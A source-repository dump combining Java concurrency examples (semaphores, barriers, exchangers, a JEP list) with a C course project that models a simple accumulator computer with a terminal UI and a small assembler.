Features](http://openjdk.java.net/jeps/272) 273: [DRBG-Based SecureRandom Implementations](http://openjdk.java.net/jeps/273) 274: [Enhanced Method Handles](http://openjdk.java.net/jeps/274) 275: [Modular Java Application Packaging](http://openjdk.java.net/jeps/275) 276: [Dynamic Linking of Language-Defined Object Models](http://openjdk.java.net/jeps/276) 277: [Enhanced Deprecation](http://openjdk.java.net/jeps/277) 278: 
[Additional Tests for Humongous Objects in G1](http://openjdk.java.net/jeps/278) 279: [Improve Test-Failure Troubleshooting](http://openjdk.java.net/jeps/279) 280: [Indify String Concatenation](http://openjdk.java.net/jeps/280) 281: [HotSpot C++ Unit-Test Framework](http://openjdk.java.net/jeps/281) 282: [jlink: The Java Linker](http://openjdk.java.net/jeps/282) 283: [Enable GTK 3 on Linux](http://openjdk.java.net/jeps/283) 284: [New HotSpot Build System](http://openjdk.java.net/jeps/284) 285: [Spin-Wait Hints](http://openjdk.java.net/jeps/285) 287: [SHA-3 Hash Algorithms](http://openjdk.java.net/jeps/287) 288: [Disable SHA-1 Certificates](http://openjdk.java.net/jeps/288) 289: [Deprecate the Applet API](http://openjdk.java.net/jeps/289) 290: [Filter Incoming Serialization Data](http://openjdk.java.net/jeps/290) 291: [Deprecate the Concurrent Mark Sweep (CMS) Garbage Collector](http://openjdk.java.net/jeps/291) 292: [Implement Selected ECMAScript 6 Features in Nashorn](http://openjdk.java.net/jeps/292) 294: [Linux/s390x Port](http://openjdk.java.net/jeps/294) 295: [Ahead-of-Time Compilation](http://openjdk.java.net/jeps/295) 297: [Unified arm32/arm64 Port](http://openjdk.java.net/jeps/297) 298: [Remove Demos and Samples](http://openjdk.java.net/jeps/298) 299: [Reorganize Documentation](http://openjdk.java.net/jeps/299)<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/semaphore/SemaphoreTest.java package com.spectred.synchronizer.semaphore; import java.util.Objects; import java.util.concurrent.Semaphore; /** * 信号量 * items为共享资源,当线程尝试使用共享资源时,先要求线程获取许可(acquire()),线程拥有了权限,否则等待, * 使用完资源后,调用release()释放许可 * * 对于共享资源的访问需要用锁来控制,信号量仅仅保证线程有使用权限,其中的并发问题由锁来保证 * * 许可数量不大于0代表共享资源不可用,许可数大于0代表资源可用,且多个线程可以同时访问共享资源 * @author SWD */ public class SemaphoreTest { /** * 可同时访问资源的最大线程数 */ private static final int MAX_AVAILABLE = 100; private final Semaphore available = new Semaphore(MAX_AVAILABLE, true); /** * 共享资源 */ protected Object[] items = new Object[MAX_AVAILABLE]; 
private boolean[] used = new boolean[MAX_AVAILABLE]; public Object getItem() throws InterruptedException { available.acquire(); return getNextAvailableItem(); } public void putItem(Object x) { if (markAsUsed(x)) { available.release(); } } private synchronized Object getNextAvailableItem() { for (int i = 0; i < MAX_AVAILABLE; i++) { if (!used[i]) { used[i] = true; return items[i]; } } return null; } private synchronized boolean markAsUsed(Object item) { for (int i = 0; i < MAX_AVAILABLE; i++) { if (Objects.equals(item, items[i])) { if (used[i]) { used[i] = false; return true; } else { return false; } } } return false; } } <file_sep>/feature-java/java-9/java9/src/test/java/com/spectred/feature/HTTP2ClientTest.java package com.spectred.feature; import jdk.incubator.http.HttpClient; import jdk.incubator.http.HttpRequest; import jdk.incubator.http.HttpResponse; import org.junit.Test; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; /** * HTTP/2 Client(孵化中) * 孵化中的API,等待后续版本更新... 
* <a href="http://openjdk.java.net/jeps/110">JEP 110: HTTP/2 Client (Incubator)</a> * * @author Spectred */ public class HTTP2ClientTest { @Test public void testHTTPClient() throws URISyntaxException, IOException, InterruptedException { // HttpClient httpClient = HttpClient.newHttpClient(); // HttpResponse<String> response = httpClient.send( // HttpRequest.newBuilder(new URI("https://www.google.com/")).GET().build(), // HttpResponse.BodyHandler.asString()); // int statusCode = response.statusCode(); // String body = response.body(); // System.out.println("[statusCode]:" + statusCode); // System.out.println("[body]:" + body); } } <file_sep>/feature-java/java-9/java9/src/test/java/com/spectred/feature/JsonTest.java package com.spectred.feature; import org.junit.Test; public class JsonTest { @Test public void testJson(){ } } <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/cyclicbarrier/CyclicBarrierExceptionTest.java package com.spectred.synchronizer.cyclicbarrier; import java.util.concurrent.BrokenBarrierException; import java.util.concurrent.CyclicBarrier; public class CyclicBarrierExceptionTest { private static final int N = 5; public static void main(String[] args) throws InterruptedException { CyclicBarrier cb = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { Thread t = new Thread(new PrepareWork(cb), "Thread-" + i); t.start(); if (i == 3) { // 中断 t.interrupt(); } } Thread.sleep(3000); System.out.println("Barrier是否损坏:" + cb.isBroken()); } private static class PrepareWork implements Runnable { private CyclicBarrier cb; PrepareWork(CyclicBarrier cb) { this.cb = cb; } @Override public void run() { try { System.out.println(Thread.currentThread().getName() + ": 准备完成"); cb.await(); } catch (InterruptedException e) { System.out.println(Thread.currentThread().getName() + ": 被中断"); } catch (BrokenBarrierException e) { System.out.println(Thread.currentThread().getName() + ": 抛出BrokenBarrierException"); } } } 
} <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/README.md ## J.U.C #### 1. synchronizer ##### 1.1 CountDownLatch CountDownLatch是一个辅助同步器类,倒数计数器,计数为0时触发事件。 给定初始计数值`n`,每调用一次`CountDownLatch#countDown()`,`n=n-1`, 调用`CountDownLatch#await()`方法阻塞线程,直到`n=0`. ###### 1.1.1 主线程执行完,再执行子线程 ```java public class CountDownLatchTest { /** * 主线程只有一个线程,当主线程执行完成,开始执行所有的子线程 */ private static final int N = 1; @Test public void testSwitch() { CountDownLatch countDownLatch = new CountDownLatch(N); for (int i = 0; i < 10; i++) { new Thread(new CountDownLatchSwitchRunnable(countDownLatch)).start(); } System.out.println("main done"); // 在调用countDown()的线程打开入口前,所有调用await的线程都一直在入口等待 => 当主线程执行完,再执行子线程 countDownLatch.countDown(); } } class CountDownLatchSwitchRunnable implements Runnable { private CountDownLatch countDownLatch; public CountDownLatchSwitchRunnable(CountDownLatch countDownLatch) { this.countDownLatch = countDownLatch; } @Override public void run() { try { countDownLatch.await(); System.out.println("do something"); } catch (InterruptedException e) { e.printStackTrace(); } } } ``` ###### 1.1.2 子线程执行完,再执行主线程 ```java public class CountDownLatchTest { /** * 子线程数量,当所有的子线程执行完成,开始执行主线程 */ private static final int M = 10; @Test public void testSignal() throws InterruptedException { CountDownLatch countDownLatch = new CountDownLatch(M); for (int i = 0; i < M; i++) { new Thread(new CountDownLatchSignalRunnable(countDownLatch)).start(); } countDownLatch.await(); // 保证在此之后的代码继续执行=>所有子线程执行完,再执行主线程 System.out.println("main done"); } } class CountDownLatchSignalRunnable implements Runnable { private final CountDownLatch countDownLatch; public CountDownLatchSignalRunnable(CountDownLatch countDownLatch) { this.countDownLatch = countDownLatch; } @Override public void run() { System.out.println(Thread.currentThread().getName()); countDownLatch.countDown(); } } ``` ##### 1.2 CyclicBarrier CyclicBarrier是一个辅助同步器,**让线程达到栅栏时被阻塞(调用await()方法),直到到达栅栏的线程数满足指定的数量要求时,栅栏才会打开放行**。 ###### 1.2.1 
基础示例 ```java /** * 循环屏障 */ public class CyclicBarrierTest { private static final int N = 5; public static void main(String[] args) { /* * 当线程数量达到N后开始执行 */ CyclicBarrier cyclicBarrier = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { new Thread(new Worker(cyclicBarrier), "Thread-" + i).start(); } } private static class Worker implements Runnable { private CyclicBarrier cyclicBarrier; public Worker(CyclicBarrier cyclicBarrier) { this.cyclicBarrier = cyclicBarrier; } @Override public void run() { try { Thread.sleep(3000); System.out.println(Thread.currentThread().getName() + " : prepare"); cyclicBarrier.await(); } catch (InterruptedException | BrokenBarrierException e) { e.printStackTrace(); } } } } // --- 预期结果 --- Thread-0 : prepare Thread-1 : prepare Thread-2 : prepare Thread-4 : prepare Thread-3 : prepare All Over ... ``` ###### 1.2.2 CyclicBarrier对异常的处理 ```java public class CyclicBarrierExceptionTest { private static final int N = 5; public static void main(String[] args) throws InterruptedException { CyclicBarrier cb = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { Thread t = new Thread(new PrepareWork(cb), "Thread-" + i); t.start(); if (i == 3) { // 中断 t.interrupt(); } } Thread.sleep(3000); System.out.println("Barrier是否损坏:" + cb.isBroken()); } private static class PrepareWork implements Runnable { private CyclicBarrier cb; PrepareWork(CyclicBarrier cb) { this.cb = cb; } @Override public void run() { try { System.out.println(Thread.currentThread().getName() + ": 准备完成"); cb.await(); } catch (InterruptedException e) { System.out.println(Thread.currentThread().getName() + ": 被中断"); } catch (BrokenBarrierException e) { System.out.println(Thread.currentThread().getName() + ": 抛出BrokenBarrierException"); } } } } // --- 预期结果 --- Thread-0: 准备完成 Thread-3: 准备完成 Thread-1: 准备完成 Thread-2: 准备完成 Thread-4: 准备完成 Thread-4: 抛出BrokenBarrierException Thread-3: 被中断 Thread-0: 
抛出BrokenBarrierException Thread-2: 抛出BrokenBarrierException Thread-1: 抛出BrokenBarrierException Barrier是否损坏:true ``` ##### 1.3 Semaphore ##### 1.4 Exchanger ##### 1.5 Phaser<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/exchanger/ExchangerTest.java package com.spectred.synchronizer.exchanger; import java.util.concurrent.Exchanger; /** * 交换器 * * @author SWD */ public class ExchangerTest { public static void main(String[] args) { Exchanger<String> exchanger = new Exchanger<>(); Thread t1 = new Thread(new Consumer(exchanger), "消费者-T1"); Thread t2 = new Thread(new Producer(exchanger), "生产者-T2"); t1.start(); t2.start(); } } class Producer implements Runnable { private final Exchanger<String> exchanger; public Producer(Exchanger<String> exchanger) { this.exchanger = exchanger; } @Override public void run() { String message = null; for (int i = 0; i < 3; i++) { try { Thread.sleep(1000); message = String.valueOf(i); System.out.println(Thread.currentThread().getName() + " 生产数据==> " + message); String exchange = exchanger.exchange(message); System.out.println(Thread.currentThread().getName() + " 交换得到数据==> " + exchange); } catch (InterruptedException e) { e.printStackTrace(); } } } } class Consumer implements Runnable { private final Exchanger<String> exchanger; public Consumer(Exchanger<String> exchanger) { this.exchanger = exchanger; } @Override public void run() { String msg = null; while (true) { try { Thread.sleep(1000); msg = exchanger.exchange(msg); System.out.println(Thread.currentThread().getName() + " 消费了数据 " + msg); msg=null; } catch (InterruptedException e) { e.printStackTrace(); } } } } <file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/cyclicbarrier/CyclicBarrierTest.java package com.spectred.synchronizer.cyclicbarrier; import java.util.concurrent.BrokenBarrierException; import java.util.concurrent.CyclicBarrier; /** * 循环屏障 */ public class CyclicBarrierTest { private static final int N = 5; public static void main(String[] 
args) { /* * 当线程数量达到N后开始执行 */ CyclicBarrier cyclicBarrier = new CyclicBarrier(N, () -> System.out.println("All Over ...")); for (int i = 0; i < N; i++) { new Thread(new Worker(cyclicBarrier), "Thread-" + i).start(); } } private static class Worker implements Runnable { private CyclicBarrier cyclicBarrier; public Worker(CyclicBarrier cyclicBarrier) { this.cyclicBarrier = cyclicBarrier; } @Override public void run() { try { Thread.sleep(3000); System.out.println(Thread.currentThread().getName() + " : prepare"); cyclicBarrier.await(); } catch (InterruptedException | BrokenBarrierException e) { e.printStackTrace(); } } } } <file_sep>/README.md # flame-java thread-java 线程 concurrent-java j.u.c feature-java =======
439220f6c2dc55bf70558abb9c8f544e50714c15
[ "Markdown", "Java" ]
13
Java
Spectred/flame-java
3feff233cd5fbbc1994a7160e3904da609098337
fc77e466a80f04dc6ef73e7ef0c105d90f2f480a
refs/heads/master
<repo_name>saurabhkumar13/pathvisio<file_sep>/modules/org.pathvisio.gui/src/org/pathvisio/gui/handler/MultiLineTextHandler.java // PathVisio, // a tool for data visualization and analysis using Biological Pathways // Copyright 2006-2011 BiGCaT Bioinformatics // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package org.pathvisio.gui.handler; import org.pathvisio.core.model.PropertyType; import org.pathvisio.core.model.StaticPropertyType; import javax.swing.*; import javax.swing.border.LineBorder; import javax.swing.table.DefaultTableCellRenderer; import javax.swing.table.TableCellEditor; import javax.swing.table.TableCellRenderer; import java.awt.*; /** * This class knows how to handle text with newlines. *.. * @author <NAME> */ public class MultiLineTextHandler extends DefaultCellEditor implements TableCellRenderer, TypeHandler{ private TableCellRenderer cellRenderer = new DefaultTableCellRenderer(); JTextArea textArea; JScrollPane scrollPane; /** * Constructor. * .. 
*/ public MultiLineTextHandler() { super( new JTextField() ); textArea = new JTextArea(); scrollPane = new JScrollPane(); scrollPane.setViewportView( textArea ); editorComponent = scrollPane; } //-- TableCellRenderer methods --// public Component getTableCellEditorComponent(JTable table, Object value, boolean isSelected, int row, int column ) { this.setValue( value ); scrollPane.setBorder( new LineBorder( Color.black ) ); return scrollPane; } public void setValue( Object value ) { textArea.setText( ( value != null ) ? value.toString() : "" ); } public Object getCellEditorValue() { return textArea.getText(); } public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { return cellRenderer.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column); } //-- TypeHandler methods --// public PropertyType getType() { return StaticPropertyType.STRING; } public TableCellRenderer getLabelRenderer() { return null; } public TableCellRenderer getValueRenderer() { return this; } public TableCellEditor getValueEditor() { return this; } }
b7efc413ceb8b1774ed653fa745c5f1ecd6eddf7
[ "Java" ]
1
Java
saurabhkumar13/pathvisio
41079afa4e7c5a1d943880d428f8d121cb0f8cfa
5dcff9ea7693d92402a6a0c0542cd813926e4137
refs/heads/master
<file_sep>#include "cmd_handler.h" int READ(int operand)//input in cell { return 0; } int WRITE(int operand)//output from cell { return 0; } int LOAD(int operand)//load in accum from cell { int value = 0; memGet(operand, &value); acc = value; return 0; } int STORE(int operand) { memSet(operand, acc); return 0; } int ADD(int operand) { int tmp; memGet(operand, &tmp); acc += tmp; return 0; } int SUB(int operand) { int tmp; memGet(operand, &tmp); acc -= tmp; return 0; } int DIVIDE(int operand) { int tmp; memGet(operand, &tmp); if(tmp == 0) { regSet(FLAG_DIVIDE, 0x1); return -1; } else { acc /= tmp; } return 0; } int MUL(int operand) { int tmp; memGet(operand, &tmp); acc *= tmp; return 0; } int JUMP(int operand) { inst_cnt = operand; return 0; } int JNEG(int operand) { if(acc < 0x0) inst_cnt = operand; return 0; } int JZ(int operand) { if(acc == 0x0) inst_cnt = operand; return 0; } int HALT(int operand) { regSet(FLAG_INTERRUPT, 0x1); return 0; } int NOT(int operand) { memSet(operand, ~acc); return 0; } int AND(int operand) { int tmp; memGet(operand, &tmp); acc = acc & tmp; return 0; } int OR(int operand) { int tmp; memGet(operand, &tmp); acc = acc | tmp; return 0; } int XOR(int operand) { int tmp; memGet(operand, &tmp); acc = acc ^ tmp; return 0; } int JNS(int operand) { if(acc > 0) inst_cnt = operand; return 0; } int JC(int operand) { if(acc > 0x7f) inst_cnt = operand; return 0; } int JNC(int operand) { if(acc < 0x7f) inst_cnt = operand; return 0; } int JP(int operand) { if(acc % 2 == 0) inst_cnt = operand; return 0; } int JNP(int operand) { if(acc % 2 != 0) inst_cnt = operand; return 0; } int CHL(int operand) { int tmp; memGet(operand, &tmp); acc = tmp << 0x1; return 0; } int SHR(int operand) { int tmp; memGet(operand, &tmp); acc = tmp >> 0x1; return 0; } int RCL(int operand) { int tmp, buf = 0x40; memGet(operand, &tmp); buf = buf & tmp; buf = buf >> 6; tmp = tmp << 1; acc = tmp | buf; return 0; } int RCR(int operand) { int tmp, buf = 0x1; memGet(operand, &tmp); buf 
= buf & tmp; tmp = tmp >> 1; buf = buf << 6; acc = buf | tmp; return 0; } int NEG(int operand) { return 0; } int SUBC(int operand) { int tmp, tmp1; memGet(operand, &tmp); memGet(acc, &tmp1); acc = tmp - tmp1; return 0; } int LOGLC(int operand) { return 0; } int LOGRC(int operand) { return 0; } int RCCL(int operand) { return 0; } int RCCR(int operand) { return 0; } int MOVA(int operand) { int tmp; memGet(operand, &tmp); memSet(acc, tmp); return 0; } int MOVR(int operand) { int tmp; memGet(acc, &tmp); memSet(operand, tmp); return 0; } int MOVCA(int operand) { return 0; } int MOVCR(int operand) { return 0; } int ADDC(int operand) { int tmp, tmp1; memGet(operand, &tmp); memGet(acc, &tmp1); acc = tmp + tmp1; return 0; }<file_sep>#ifndef MF_H #define MF_H #define RAM_X 2 #define RAM_Y 2 #define ACC_X 64 #define ACC_Y 2 #define INST_CNT_X 64 #define INST_CNT_Y 5 #define OPER_X 64 #define OPER_Y 8 #define FL_X 64 #define FL_Y 11 #define KEY_X 54 #define KEY_Y 14 #define BC_X 2 #define BC_Y 14 #define FD 1 #define HIDE_CURSOR "\E[?25l" #define SHOW_CURSOR "\E[?25h" #include "../big_chars/bc.h" void init_frame(); void init_ram_box(); void init_key_box(); void init_big_char_box(); void init_info_box(); void cursor(char *str); #endif<file_sep>#include <stdio.h> #include "cmp.h" int main() { cursor(HIDE_CURSOR);// start initialization init_frame(); memInit(); regInit(); init_sig_handlers(); set_non_canonical_regime(0x1, 0x0); while(hand_exit) { print_ram(&cur_cell); print_acc(); print_inst_cnt(); print_operation(); print_cur_cell(); print_flags(); key_handler(key); } clear(); //clearing cursor(SHOW_CURSOR); set_non_canonical_regime(0x0, 0x1); return 0; } <file_sep>#include "mt.h" #include <stdio.h> #include <string.h> int clear(void) { write(1, "\E[2J\E[0;0H",strlen("\E[2J\E[0;0H")); return 0; } int term_xy(int x, int y) { char str[20]; int rows, cols; get_screen_size(&rows, &cols); if((x >= 0 && x <= cols) && (y >= 0 && y <= rows)) { if(sprintf(str, "\E[%d;%dH", y, x)) 
write(1, str, strlen(str)); else return -1; } return 0; } int get_screen_size(int *rows, int *cols) { struct winsize size; if(!ioctl(0, TIOCGWINSZ, &size)) { *rows = size.ws_row; *cols = size.ws_col; return 0; } else return -1; } int fg_color(enum colors color) { char str[20]; if(!sprintf(str, "\E[%dm", (color+30))) return -1; else write(1, str, strlen(str)); return 0; } int bg_color(enum colors color) { char str[20]; if(!sprintf(str, "\E[%dm", (color+40))) return -1; else write(1, str, strlen(str)); return 0; } <file_sep>#include "rk.h" int read_key(enum keys *key) { struct termios def_options; //default options from termios char buf[16]; int readNum; if(tcgetattr(STDIN_FILENO, &def_options) != 0) //tcgetattr(fd, termios *) return -1; readNum = read(STDIN_FILENO, buf, 15); //IN stream if(readNum < 0) return -1; buf[readNum] = '\0'; if(strcmp(buf, "\E[15~") == 0) *key = f5_key; else if(strcmp(buf, "\E[17~") == 0) *key = f6_key; else if(strcmp(buf, "\E[A") == 0) *key = up_key; else if(strcmp(buf, "\E[B") == 0) *key = down_key; else if(strcmp(buf, "\E[C") == 0) *key = right_key; else if(strcmp(buf, "\E[D") == 0) *key = left_key; else if(strcmp(buf, "\n") == 0) *key = enter_key; else if(strcmp(buf, "\E") == 0) *key = esc_key; else if(strcmp(buf, "l") == 0) *key = l_key; else if(strcmp(buf, "r") == 0) *key = r_key; else if(strcmp(buf, "q") == 0) *key = q_key; else if(strcmp(buf, "x") == 0) *key = x_key; else if(strcmp(buf, "s") == 0) *key = s_key; else if(strcmp(buf, "i") == 0) *key = i_key; else if(strcmp(buf, "t") == 0) *key = t_key; else if(strcmp(buf, "d") == 0) *key = d_key; if(tcsetattr(STDIN_FILENO, TCSANOW, &def_options) != 0) //tcsetattr(fd, optional_actions, termios *) return -1; return 0; } int term_save(void) { struct termios options; FILE *save; if(tcgetattr(STDIN_FILENO, &options) != 0) return -1; if((save = fopen("termsettings.con","wb" )) == NULL) return -1; fwrite(&options, sizeof(options), 1, save); fclose(save); return 0; } int term_restore(void) { 
struct termios options; FILE *data; if((data = fopen("termsettings.con", "rb")) == NULL) return -1; else { if(fread(&options, sizeof(options), 1, data) > 0) { if(tcsetattr(STDIN_FILENO, TCSAFLUSH, &options) != 0) { fclose(data); return -1; } else { fclose(data); return -1; } } fclose(data); } return 0; } int set_term_regime(int regime, int vtime, int vmin, int echo, int sigint) { struct termios options; if(tcgetattr(STDIN_FILENO, &options) != 0) return -1; if(regime == 1) options.c_lflag |= ICANON; else if(regime == 0) options.c_lflag &= ~ICANON; else return -1; if(regime == 0) { options.c_cc[VTIME] = vtime; options.c_cc[VMIN] = vmin; if(echo == 1) options.c_lflag |= ECHO; else if(echo == 0) options.c_lflag &= ~ECHO; else return -1; if(sigint == 1) options.c_lflag |= ISIG; else if(sigint == 0) options.c_lflag &= ~ISIG; else return -1; } if(tcsetattr(STDIN_FILENO, TCSANOW, &options) != 0) return -1; return 0; } <file_sep>#ifndef RK_H #define RK_H #include <unistd.h> #include <termios.h> #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <string.h> /*termios struct * tcflag_t c_iflag input mode * tcflag_t c_oflag output mode * tcflag_t c_cflag control mode * tcflag_t c_lflag local mode * cc_t c__cc[NCCS]; control sym *ECHO echo input characters * ICANON enable canonical mode * ISIG when any of the character INTR, QUIT, SUSP or DSUSP are received * VMIN minimum number of characters for noncanonical read * VTIME timeout in deciseconds for noncanonical read */ enum keys { other_key = 0, up_key, down_key, right_key, left_key, enter_key, esc_key, f5_key, f6_key, l_key, r_key, i_key, t_key, s_key, x_key, d_key, q_key }; int read_key(enum keys *key); int term_save(void); int term_restore(void); int set_term_regime(int regime, int vtime, int vmin, int echo, int sigint); #endif<file_sep>#include <stdio.h> #include <string.h> #include "../simple_computer/sc.h" FILE *fl_open(const char *filename) { FILE *input = fopen(filename, "r"); return input; } void 
translate(FILE *input ,const char *filename) { int flag = 0, i = 0; for(i = 0; !feof(input); i++) { int line, cmd, operand, value; char command[10] = "\0"; if(!fscanf(input, "%d", &line)) { flag = 1; break; } fscanf(input, "%s", command); if(!strcmp(command, "READ")) cmd = 0x10; else if(!strcmp(command, "WRITE")) cmd = 0x11; else if(!strcmp(command, "LOAD")) cmd = 0x20; else if(!strcmp(command, "STORE")) cmd = 0x21; else if(!strcmp(command, "ADD")) cmd = 0x30; else if(!strcmp(command, "SUB")) cmd = 0x31; else if(!strcmp(command, "DIVIDE")) cmd = 0x32; else if(!strcmp(command, "MUL")) cmd = 0x33; else if(!strcmp(command, "JUMP")) cmd = 0x40; else if(!strcmp(command, "JNEG")) cmd = 0x41; else if(!strcmp(command, "JZ")) cmd = 0x42; else if(!strcmp(command, "HALT")) cmd = 0x43; else if(!strcmp(command, "NOT")) cmd = 0x51; else if(!strcmp(command, "AND")) cmd = 0x52; else if(!strcmp(command, "XOR")) cmd = 0x54; else if(!strcmp(command, "JNS")) cmd = 0x55; else if(!strcmp(command, "JC")) cmd = 0x56; else if(!strcmp(command, "JNC")) cmd = 0x57; else if(!strcmp(command, "JP")) cmd = 0x58; else if(!strcmp(command, "JNP")) cmd = 0x59; else if(!strcmp(command, "CHL")) cmd = 0x60; else if(!strcmp(command, "SHR")) cmd = 0x61; else if(!strcmp(command, "RCL")) cmd = 0x62; else if(!strcmp(command, "RCR")) cmd = 0x63; else if(!strcmp(command, "NEG")) cmd = 0x64; else if(!strcmp(command, "ADDC")) cmd = 0x65; else if(!strcmp(command, "SUBC")) cmd = 0x66; else if(!strcmp(command, "LOGLC")) cmd = 0x67; else if(!strcmp(command, "LOGRC")) cmd = 0x68; else if(!strcmp(command, "RCCL")) cmd = 0x69; else if(!strcmp(command, "RCCR")) cmd = 0x70; else if(!strcmp(command, "MOVA")) cmd = 0x71; else if(!strcmp(command, "MOVR")) cmd = 0x72; else if(!strcmp(command, "MOVCA")) cmd = 0x73; else if(!strcmp(command, "MOVCR")) cmd = 0x74; else if(!strcmp(command, "ADDC")) cmd = 0x75; else if(!strcmp(command, "=")) cmd = 0x0; else { flag = 2; break; } if(!fscanf(input, "%x", &operand)) { flag = 3; break; 
} if(comEnc(cmd, operand, &value)) { flag = 4; break; } memSet(i, value); } if(!flag) memSave(filename); if (flag == 1) fprintf(stderr, "line %d: expected num of line\n", ++i); if (flag == 2) fprintf(stderr, "line %d: wrong command\n", ++i); if (flag == 3) fprintf(stderr, "line %d: wrong operand\n", ++i); if (flag == 4) fprintf(stderr, "line %d: wrong command or operand\n", ++i); } int main(int argc, const char **argv) { if(argc < 3 || argc > 4) { fprintf(stderr, "Incorrect input.sa/output.o file\n"); return -1; } FILE *input = fl_open(argv[1]); if(input == NULL) { fprintf(stderr, "Cannot open file\n"); return -1; } memInit(); translate(input, argv[2]); return 0; }<file_sep>#ifndef CMD_HANDLER_H #define CMD_HANDLER_H #include "../simple_computer/sc.h" #include "../cmp.h" int READ(int operand); int WRITE(int operand); int LOAD(int operand); int STORE(int operand); int ADD(int operand); int SUB(int operand); int DIVIDE(int operand); int MUL(int operand); int JUMP(int operand); int JNEG(int operand); int JZ(int operand); int HALT(int operand); int NOT(int operand); int AND(int operand); int OR(int operand); int XOR(int operand); int JNS(int operand); int JC(int operand); int JNC(int operand); int JP(int operand); int JNP(int operand); int CHL(int operand); int SHR(int operand); int RCL(int operand); int RCR(int operand); int NEG(int operand); int ADDC(int operand); int SUBC(int operand); int LOGLC(int operand); int LOGRC(int operand); int RCCL(int operand); int RCCR(int operand); int MOVA(int operand); int MOVR(int operand); int MOVCA(int operand); int MOVCR(int operand); #endif<file_sep>#ifndef MT_H #define MT_H #include <string.h> #include <unistd.h> #include <sys/ioctl.h> enum colors { BLACK = 0, RED = 1, GREEN = 2, YELLOW = 3, BLUE = 4, PURPLE = 5, LBLUE = 6, WHITE = 7, DEFAULT = 9 }; int clear(void); int term_xy(int x, int y); int get_screen_size(int *rows, int *cols); int fg_color(enum colors color); int bg_color(enum colors color); #endif <file_sep>Course 
Project Model of Simple Computer on i8086 <file_sep>#ifndef CMP_H #define CMP_H #include "simple_computer/sc.h" #include "main_frame/mf.h" #include "read_keys/rk.h" #include "cpu/alu.h" #include <signal.h> #include <signal.h> #include <sys/time.h> extern int acc, inst_cnt, operation, cur_cell, hand_exit; struct itimerval timer; extern enum keys key; void key_handler(enum keys key); void cell_step(int sig); //for signal void return_hand_manage(int sig);//for signal void print_ram(int *cell); //write cells of memory void print_acc(); void print_inst_cnt(); void print_operation(); void print_flags(); void print_cur_cell(); void init_sig_handlers(); void transform_bchar(char *sym, int *big); int set_non_canonical_regime(int vmin, int echo); extern const char flags[5]; //Overflow, Zero Div, Out of memoory, Interrupt, Incorrected commnand extern char bigchar_0[64]; extern char bigchar_1[64]; extern char bigchar_2[64]; extern char bigchar_3[64]; extern char bigchar_4[64]; extern char bigchar_5[64]; extern char bigchar_6[64]; extern char bigchar_7[64]; extern char bigchar_8[64]; extern char bigchar_9[64]; extern char bigchar_A[64]; extern char bigchar_B[64]; extern char bigchar_C[64]; extern char bigchar_D[64]; extern char bigchar_E[64]; extern char bigchar_F[64]; extern char bigchar_PLUS[64]; extern char *ind[17]; #endif <file_sep>#include "mf.h" void init_frame()//print main frame { clear(); init_ram_box(); init_info_box(); init_big_char_box(); init_key_box(); } void init_ram_box() //window with cells of memory { box(RAM_X, RAM_Y, RAM_X + 61, RAM_Y + 11); term_xy((RAM_X + 60) / 2 - 3, RAM_Y); write(FD, "MEMORY", strlen("MEMORY")); } void init_big_char_box() //window with current cell of memory which { //is storage in instruction counter box(BC_X, BC_Y, BC_X + 51, BC_Y + 11); } void init_key_box() //window with manage keys { box(KEY_X, KEY_Y, KEY_X + 32, KEY_Y + 11); term_xy(KEY_X + 32 / 2 - 9, KEY_Y); write(FD, "KEYS", strlen("KEYS")); term_xy(KEY_X + 1, KEY_Y + 1); 
write(FD, "L - load", strlen("L - load")); term_xy(KEY_X + 1, KEY_Y + 2); write(FD, "S - save", strlen("S - save")); term_xy(KEY_X + 1, KEY_Y + 3); write(FD, "R - run", strlen("R - run")); term_xy(KEY_X + 1, KEY_Y + 4); write(FD, "T - step", strlen("T - step")); term_xy(KEY_X + 1, KEY_Y + 5); write(FD, "I - reset", strlen("I - reset")); term_xy(KEY_X + 1, KEY_Y + 6); write(FD, "F5 - accumulator", strlen("F5 - accumulator")); term_xy(KEY_X + 1, KEY_Y + 7); write(FD, "F6 - instruction counter", strlen("F6 - instruction counter")); } void init_info_box() //window with current statuses of { //accumulator, instruction counter, operarion, flags box(ACC_X, ACC_Y, ACC_X + 22, ACC_Y + 2); //accumulator box term_xy(ACC_X + 22 / 2 - 5, ACC_Y); write(FD, "ACCUMULATOR", strlen("ACCUMULATOR")); box(INST_CNT_X, INST_CNT_Y, INST_CNT_X + 22, INST_CNT_Y + 2); //instcounter box term_xy(INST_CNT_X + 22 / 2 - 9, INST_CNT_Y); write(FD, "INSTRUCTIONCOUNTER", strlen("INSTRUCTIONCOUNTER")); box(OPER_X, OPER_Y, OPER_X + 22, OPER_Y + 2); //operatin box term_xy(OPER_X + 22 / 2 - 4, OPER_Y); write(FD, "OPERATION", strlen("OPERATION")); box(FL_X, FL_Y, FL_X + 22, FL_Y + 2); //flags box term_xy(FL_X + 22 / 2 - 2, FL_Y); write(FD, "FLAGS", strlen("FLAGS")); } void cursor(char *str) { write(FD, str, strlen(str)); }<file_sep>#include "bc.h" void printA(char str) { int len = 1 + strlen("\E(0\E(B"); char *_str = (char*)malloc(len * sizeof(char)); sprintf(_str, "\E(0%c\E(B", str); write(1, _str, strlen(_str)); } int box(int x1, int y1, int x2, int y2) { int xmax, ymax; get_screen_size(&ymax, &xmax); if(x1 < 0 || x2 < 0 || y1 < 0 || y2 < 0 || x1 > xmax || x2 > xmax || y1 > ymax || y2 > ymax) return -1; term_xy(x1, y1); 